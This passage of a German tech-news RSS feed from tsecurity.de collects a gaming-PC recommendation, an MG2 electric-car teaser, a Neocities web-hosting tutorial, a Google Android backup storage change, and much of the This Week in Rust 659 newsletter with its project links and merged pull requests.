data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">CYBERPOWERPC </p></div>



		<div class="promo_wrap promo_wrap_sticky">
			<div class="row_wrapper">
				<div class="column_wrapper">
					<p class="eyebrow">Empfehlung Gaming-PC</p>
					<p class="promo-title"><strong>Cyberpowerpc Luxe Gaming-PC (5070 Ti, 9800X3D, 32 GB RAM)</strong></p>
					<p class="promo-description">2.239 Euro</p>
				</div>
				<div class="more_btn"><a href="https://www.amazon.de/dp/B0DZJ16C8L?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" class="sticky-promotion-view-deal-link" data-vars-link-position="Floating Conversion Unit">Erfahren Sie mehr</a></div>
			</div>
		</div>
		


<p>Bis hin zur 4K-Auflösung sind Sie mit dem Cyberpowerpc Luxe gut fürs Gaming aufgestellt. Die Nvidia Geforce RTX 5070 Ti bringt 16 GB GDDR7-Videospeicher und modernste Bildverbesserungstechniken wie DLSS 4.5 mit. Zur Seite gestellt ist die Grafikkarte der Achtkern-Prozessor <a href="https://www.pcwelt.de/article/1165008/der-ideale-gaming-prozessor-tipps-zum-cpu-kauf.html" target="_blank" rel="noreferrer noopener">AMD Ryzen 7 9800X3D</a> mit dem Gaming-Turbo 3D V-Cache. </p>



<p>Dazu gibt’s satte 32 GB Arbeitsspeicher und eine 1 TB große SSD. Der Rechner setzt auf eine AIO-Wasserkühlung und sorgt mit sechs RGB-Lüftern auch für eine stimmige Beleuchtung.</p>



<h2 class="wp-block-heading toc">Fazit: Wann ein neuer PC wirklich Sinn ergibt</h2>



<p>Fehlende Updates, volle Festplatten, träge Leistung, Überhitzung oder mangelnde Aufrüstbarkeit: Das sind klare Signale, dass Ihr PC ausgedient hat. Ein neues System lohnt sich aber nicht nur bei Problemen. Auch um die Produktivität zu verbessern oder um Multimedia und Gaming mit modernen Standards zu genießen, ist geeignete Hardware wichtig – und sie verspricht mehr Spaß bei der täglichen Nutzung.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Das ist der MG2: Erste Preview für das günstige Elektroauto]]></title>
<description><![CDATA[Ein MG4 für unter 25.000 Euro ist euch noch zu teuer? Dann könnte der MG2 eine Option für euch sein, der 2027 von SAIC Motor in Europa auf den Markt …]]></description>
<link>https://tsecurity.de/de/3656812/it-nachrichten/das-ist-der-mg2-erste-preview-fuer-das-guenstige-elektroauto/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656812/it-nachrichten/das-ist-der-mg2-erste-preview-fuer-das-guenstige-elektroauto/</guid>
<pubDate>Thu, 09 Jul 2026 13:17:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1600" height="1100" src="https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2026/07/mg-go-mg2-konzept-seite.jpg?fit=1600%2C1100&amp;ssl=1" class="attachment-full size-full wp-post-image" alt="" decoding="async" srcset="https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2026/07/mg-go-mg2-konzept-seite.jpg?w=1600&amp;ssl=1 1600w, https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2026/07/mg-go-mg2-konzept-seite.jpg?resize=690%2C474&amp;ssl=1 690w" sizes="(max-width: 1600px) 100vw, 1600px">
Ein MG4 für unter 25.000 Euro ist euch noch zu teuer? Dann könnte der MG2 eine Option für euch sein, der 2027 von SAIC Motor in Europa auf den Markt …]]></content:encoded>
</item>
<item>
<title><![CDATA[So veröffentlichen Sie Ihre HTML-Webseite gratis mit Neocities]]></title>
<description><![CDATA[In den frühen Jahren des World Wide Webs war Geocities eine Institution. Das Angebot öffnete allen Anwendern die Möglichkeit, selbst Webseiten zu erstellen. Nach der Anmeldung bekam man eine Sub-Domain und konnte daraufhin mit einem Baukasten sein eigenes Angebot publizieren. In den nachfolgenden...]]></description>
<link>https://tsecurity.de/de/3656131/windows-tipps/so-veroeffentlichen-sie-ihre-html-webseite-gratis-mit-neocities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656131/windows-tipps/so-veroeffentlichen-sie-ihre-html-webseite-gratis-mit-neocities/</guid>
<pubDate>Thu, 09 Jul 2026 08:26:11 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In den frühen Jahren des World Wide Webs war Geocities eine Institution. Das Angebot öffnete allen Anwendern die Möglichkeit, selbst Webseiten zu erstellen. Nach der Anmeldung bekam man eine Sub-Domain und konnte daraufhin mit einem Baukasten sein eigenes Angebot publizieren. In den nachfolgenden Jahren entstanden dadurch unzählige Seiten zu den unterschiedlichsten Themen. </p>



<p>Gegründet vor 30 Jahren, wurde das Portal später von Yahoo aufgekauft. Bis 2009 existierte es international, in Japan sogar bis 2019. Mit Neocities (https://neocities.org) gibt es eine neue Version des früheren Service. Die Nutzung des Open-Source-Projektes ist kostenlos, Nutzern steht ein Gigabyte Speicherplatz für HTML-Dokumente und Dateien wie Bilder zur Verfügung. </p>



<p>Das monatliche Transfervolumen ist auf 200 Gigabyte limitiert. Ein bezahltes Supporter-Abo erlaubt den Upload von 50 GB Daten wie auch 3000 GB Transfervolumen. Für die Gestaltung der Inhalte muss man HTML beherrschen. Die Webseiten können Sie auf Ihrem PC bearbeiten und diese anschließend auf den Server von Neocities hochladen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4f3eeec2b58"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Neocities_RGBeci.jpg?quality=50&amp;strip=all" alt="Neocities " class="wp-image-3141166" width="1024" height="791" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Neocities ist ein Webhosting-Service nach dem Vorbild von Geocities. Anwender können sich gratis anmelden und dort ihre eigenen Webseiten publizieren.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p> Dazu melden Sie sich zunächst auf der Seite an und gelangen damit in das Dashboard. Mittels Drag &amp; Drop kopieren Sie die Daten auf den Sever. Alternativ klicken Sie auf den Upload-Button und laden die Daten hoch. Anpassungen an den Seiten nehmen Sie mit dem integrierten Editor direkt online vor. </p>



<p>Dazu bewegen Sie die Maus auf die betreffende HTML-Datei, klicken auf den Link „Edit“ und gelangen so in den Bearbeitungsmodus. Nach Ausführung der Änderungen klicken Sie auf die Schaltfläche „Save“ sowie „View“ für die Vorschau. Mit „Share“ teilen Sie den Link zu Ihrer Webseite bei Bluesky, X, Reddit, Mastodon oder erzeugen einen RSS-Feed. Per „Dashboard“ oben links kehren Sie zur Übersicht zurück.  </p>



<p><strong>Lesetipp: </strong><a href="https://www.pcwelt.de/article/2685761/eigene-apps-mit-ki-programmieren.html" target="_blank" rel="noreferrer noopener">Ich programmiere jetzt meine eigenen Anwendungen mit KI und ich liebe es</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google erlaubt Android-Nutzern ab sofort kein Gratis-Backup mehr]]></title>
<description><![CDATA[Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite Engadget berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.



Für neue...]]></description>
<link>https://tsecurity.de/de/3656114/it-nachrichten/google-erlaubt-android-nutzern-ab-sofort-kein-gratis-backup-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656114/it-nachrichten/google-erlaubt-android-nutzern-ab-sofort-kein-gratis-backup-mehr/</guid>
<pubDate>Thu, 09 Jul 2026 08:17:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite <a href="https://www.engadget.com/2209189/google-will-now-count-all-android-backup-data-toward-your-storage-cap/">Engadget</a> berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.</p>



<p>Für neue Android-Nutzer tritt die Änderung ab heute, 7. Juli 2026, in Kraft. Für bestehende Nutzer wird sie in den kommenden Monaten schrittweise eingeführt.</p>



<p>Laut Google werden die Auswirkungen dieser Änderung voraussichtlich begrenzt sein. Android-Sicherungskopien werden im Durchschnitt etwa 40 Megabyte zusätzlichen Speicherplatz beanspruchen. Gleichzeitig werden weitere Einstellungen eingeführt, die den Nutzern mehr Kontrolle darüber geben, was gesichert wird.</p>



<p>Zuvor wurde etwa bekannt, <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">dass Android-Nutzer eine wichtige neue Backup-Funktion erhalten</a>, mit der sie selbst entscheiden können, welche App-Daten gesichert werden sollen und welche nicht. Demnächst möchte Google noch einführen, dass Nutzer ihre Geräteeinstellungen, den Anrufverlauf sowie SMS- und MMS-Nachrichten aus dem Sicherungsvorgang ausschließen können.</p>



<p>Es ist erwähnenswert, dass Google im Mai gleichzeitig den kostenlosen Speicherplatz für neue Konten <a href="https://www.pcwelt.de/article/3140205/googles-gratis-onlinespeicher-schrumpft-falls-sie-google-nicht-ihre-telefonnummer-verraten-test.html" target="_blank" rel="noreferrer noopener">von 15 Gigabyte auf 5 Gigabyte reduziert hat.</a> Es sei denn, der Nutzer verknüpft eine Telefonnummer mit dem Konto.</p>



<p>Je nachdem, wie viele Daten Sie bereits in der Google Cloud gesichert haben, könnte es also eng werden, selbst wenn die Sicherung nur wenige MB groß ist. Oder Sie merken von der Änderung nicht wirklich viel, da Sie ohnehin auf andere Backup-Methoden setzen.</p>



<p>Ein Upgrade auf 100 GB in <a href="https://one.google.com/about/plans?hl=de&amp;g1_landing_page=60" target="_blank" rel="noreferrer noopener">Google One</a> kostet 1,99 Euro monatlich, 2,99 Euro für 200 GB oder 9,99 Euro monatlich für 2 TB Speicherplatz. Mit enthalten ist auch der Zugriff auf “neue und leistungsstarke Funktionen” in Google Gemini.</p>



<p><a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Die besten Online-Backup-Dienste im Vergleich: Nie mehr Daten verlieren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 659]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3656000/tools/this-week-in-rust-this-week-in-rust-659/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656000/tools/this-week-in-rust-this-week-in-rust-659/</guid>
<pubDate>Thu, 09 Jul 2026 07:08:34 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/07/07/maintainer-spotlight-gen-li-rami3l/">Maintainer spotlight: Gen Li (@rami3l)</a></li>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/07/06/unite-for-clippy/">Together for a healthier Clippy</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-75">The Embedded Rustacean Issue #75</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://www.copper-robotics.com/whats-new/copper-rs-v100">copper-rs v1.0.0</a>: the open source deterministic robotics OS is now stable.</li>
<li><a href="https://rayfish.xyz/blog/01-introducing-rayfish">Rayfish: Your own private network. No servers, no setup.</a></li>
<li><a href="https://plabayo.tech/blog/rama-0-3">rama v0.3.0 — network service framework ready to be used by the wider Rust community</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.9.0">kache 0.9.0: supply-chain hardening + read-only CI cache</a></li>
<li><a href="https://www.willsearch.com.br/blog/2026/07/04/meet-guardiandbs-new-postgresql-compatibility-layer/">GuardianDB - PostgreSQL and P2P/Local-First Together</a></li>
<li><a href="https://buildnectar.com/">Nectar: a Rust-like language that compiles your whole web app to WebAssembly</a></li>
<li><a href="https://thekeeper.io/blog/logdrain-log-template-mining-in-rust/">logdrain: Fast, Embeddable Log-Template Mining in Rust</a></li>
<li><a href="https://medium.com/@vbasky/packaging-the-worlds-video-in-pure-rust-ff1f6b884fec">sheathe: Packaging the World's Video in Pure Rust</a></li>
<li><a href="https://docs.wickra.org/Quickstart-Rust">wickra: streaming-first technical indicators</a></li>
<li><a href="https://github.com/TeamXcelerator/xcelerator-solver/releases/tag/v0.1.0">Xcelerator Solver v0.1.0 -- deterministic symbolic regression</a></li>
<li><a href="https://github.com/tkmsikd/dlt-tui/releases/tag/v1.1.0">dlt-tui 1.1.0 - a fast TUI viewer for automotive DLT (AUTOSAR Diagnostic Log and Trace) files</a></li>
<li><a href="https://github.com/shihuili1218/rssh/releases/tag/v0.2.11">RSSH v0.2.11 — terminal workflows, safer SSH key import, and observable AI ops</a></li>
<li><a href="https://blog.none.at/blog/2026/2026-07-06-k8s-scale-app-rs/">k8s-scale-app-rs: Scale or Restart a Kubernetes Deployment from a CronJob</a></li>
<li><a href="https://dev.to/sicklefire/m-vis-v050-rc1-update-11cp">M-vis v0.5.0-rc1 update</a></li>
<li><a href="https://ganeshsivakumar.substack.com/p/flaredb">FlareDB: An Apache Beam Native Streaming Database built in Rust</a></li>
<li><a href="https://holovskyi.github.io/blog/typed-mqtt-topics-for-rust/">mqtt-typed-client 0.2: a type-safe async MQTT client on rumqttc</a></li>
<li><a href="https://github.com/LeChatP/RootAsRole/releases/tag/v4.0.0">RootAsRole: v4.0.0 Major release, secure execution, new logo</a></li>
<li><a href="https://www.qt.io/blog/rust-ui-framework-via-bridging-technology">A Cross-Platform Rust UI Framework via Qt’s Bridging Technology</a></li>
<li><a href="https://rapha.land/jam-programming-language/">Jam Programming Language</a></li>
<li><a href="https://www.clever.cloud/blog/company/2026/07/01/sozu-2-1-0-udp-load-balancer-programmable-edge/">Sōzu 2.1.0: UDP load balancing for the programmable edge</a></li>
<li><a href="https://op3kay.dev/writing/b0nker">b0nker: a minimal container runtime written in Rust</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li>[video] <a href="https://www.youtube.com/watch?v=SGR5qBdwk30">Rust Berlin Meetup 25/06/2026 Livestream</a></li>
<li>[video] <a href="https://www.youtube.com/live/_LtgHxuysUo">How do you rewrite C/C++ projects to Rust? – JetBrains interview with Luca Palmieri, Mainmatter</a></li>
<li><a href="https://kerkour.com/rustcrypto-slow-simd-rust">Investigating why RustCrypto is slow: Deep dive into SIMD instructions and hardware acceleration</a></li>
<li><a href="https://parsa.wtf/cast/">bool as u32</a></li>
<li><a href="https://arxiv.org/html/2605.30106">A Rust-to-Lean Verification Pipeline with AI Provers: An Experience Report</a></li>
<li><a href="https://blog.dureuill.net/articles/wip/">Work In Progress Rust</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=Fk165jYfHpc">OpenAI just spent $600k on Rust</a></li>
<li>[audio] <a href="https://corrode.dev/podcast/s06e07-rising-academies/">Rising Academies with Dylan Brown - Rust in Production Podcast</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li>[series] <a href="https://aibodh.com/posts/bevy-tutorial-build-your-first-3d-editor-in-rust/">Bevy Tutorial: Build Your First 3D Editor - Create a 3D Space on an Infinite Grid</a></li>
<li><a href="https://blog.sheerluck.dev/posts/learn-axum-basics-and-routing-by-building-a-url-shortener/">Learn Axum Basics and Routing by Building a URL Shortener</a></li>
<li>[series] <a href="https://plabayo.tech/blog/rama-101-1-https-clients-and-abstractions">Rama 101.1: HTTPS clients and layers of abstraction</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#miscellaneous">Miscellaneous</a></h5>
<ul>
<li><a href="https://seanborg.tech/tiny-blog/rust-week-ven-diagram/">Clickable euler diagram of all the Rust week talks</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://crates.io/crates/apis-saltans-core">apis-saltans</a>, a Zigbee implementation including a coordinator API.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1627">Richard Neumann</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>

<p>* <a href="https://github.com/name970/Protocol/issues/4">Protocol - Extend bit-exactness tests to f64 reconstruction targets</a>                                                                          <br>
* <a href="https://github.com/lenra-io/dofigen/issues/278">Dofigen - No image tag replacement flag for the generate command</a></p>


<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>598 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-06-30..2026-07-07">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/156976">enable eager <code>param_env</code> norm in new solver</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156379">lint on <code>core::ffi::c_void</code> as a return type</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158577">polish some macro parsing code</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158604">resolve: no allocation in <code>resolve_ident_in(_local)_module_*</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158627">simplify option-iterator flattening in the compiler</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157857">stabilize <code>#[my_macro] mod foo;</code> (part of <code>proc_macro_hygiene</code>)</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158537">add <code>std::io::cursor::WriteThroughCursor</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157347">implement <code>Box::as_non_null()</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156737">implement <code>DoubleEndedIterator::next_chunk_back</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/134021">implement <code>IntoIterator</code> for <code>[&amp;[mut]] Box&lt;[T; N], A&gt;</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158427">implement <code>ptr::{read,write}_unaligned</code> via <code>repr(packed)</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158539">move <code>SizeHint</code> and <code>IoHandle</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158540">move <code>std::io::Seek</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158704">optimize <code>ArrayChunks::try_rfold</code> with <code>DoubleEndedIterator::next_chunk_back</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158573">stabilize <code>feature(atomic_from_mut)</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17135"><code>bindeps</code>: register transitive artifact targets</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17167">avoid cloning parsed TOML manifest in <code>ManifestErrorContext</code></a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17176">avoid extra clone of parsed TOML manifest</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17178">remove unneeded cloning when parsing package index</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17169">change HashMaps and HashSets in Cargo to use Fxhasher</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17174">do not pass lint rustflags when <code>--cap-lints=allow</code> is set</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17164">fixed <code>Compilation::deps_output</code> only taking the last dep</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17177">pre-allocate a few vectors</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/16807">stabilize <code>build-dir</code> layout v2</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17180">use a set when checking visited workspace members</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustdoc">Rustdoc</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158751">fix crash when trying to inline foreign item which cannot have attributes</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158334">show use-site paths for unevaluated const array lengths</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17319"><code>chunks_exact_to_as_chunks</code>: Don't report expressions with const parameters</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17360"><code>chunks_exact_to_as_chunks</code>: Don't report expressions with type params</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17309"><code>missing_trait_methods</code>: MSRV/unstable awareness</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17289"><code>vec_init_then_push</code>: don't lint pushes from a macro expansion</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17346"><code>inline_modules</code>: ignore <code>cfg(test)</code> modules in test builds</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17345"><code>match_same_arms</code>: keep arm-level expectations working under an outer allow</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17341"><code>unnecessary_operation</code>: avoid bad <code>!</code> suggestions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17351"><code>unnecessary_unwrap_unchecked</code>: don't trigger inside the <code>_unchecked</code> fn</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17348">add required parentheses when the <code>needless_bool</code> suggestion is an operand</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17353">fix ICE when resolving local in <code>unnecessary_unwrap_unchecked</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17311">fix <code>infinite_loop</code> false positive inside gen blocks</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17358">fix <code>manual_c_str_literals</code> suggestion when the trailing backslash is escaped</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17337">fix <code>strlen_on_c_strings</code> incorrect suggestion logic</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17323">fix <code>suspicious_operation_groupings</code> duplications</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16902">lint bit width</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17338">optimize <code>Msrv::meets</code> calls</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17273">bail out of unicode lint scans when the snippet is pure ASCII</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17224">skip the HIR parent walk in <code>is_in_test_function</code> when there are no test items</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17366">place generated impl block after the existing impl block</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17333">refactor <code>StringAdd</code> lint pass</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17334">refactor <code>suspicious_xor_used_as_pow</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17293">remove <code>lower_ty</code> in <code>uninhabited_reference</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17328">respect the configured MSRV in <code>manual_is_variant_and</code>'s <code>map() == Some(_)</code> rewrite</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17332">rewrite <code>mut_mut</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17329">rewrite <code>redundant_else</code> as a late pass</a></li>
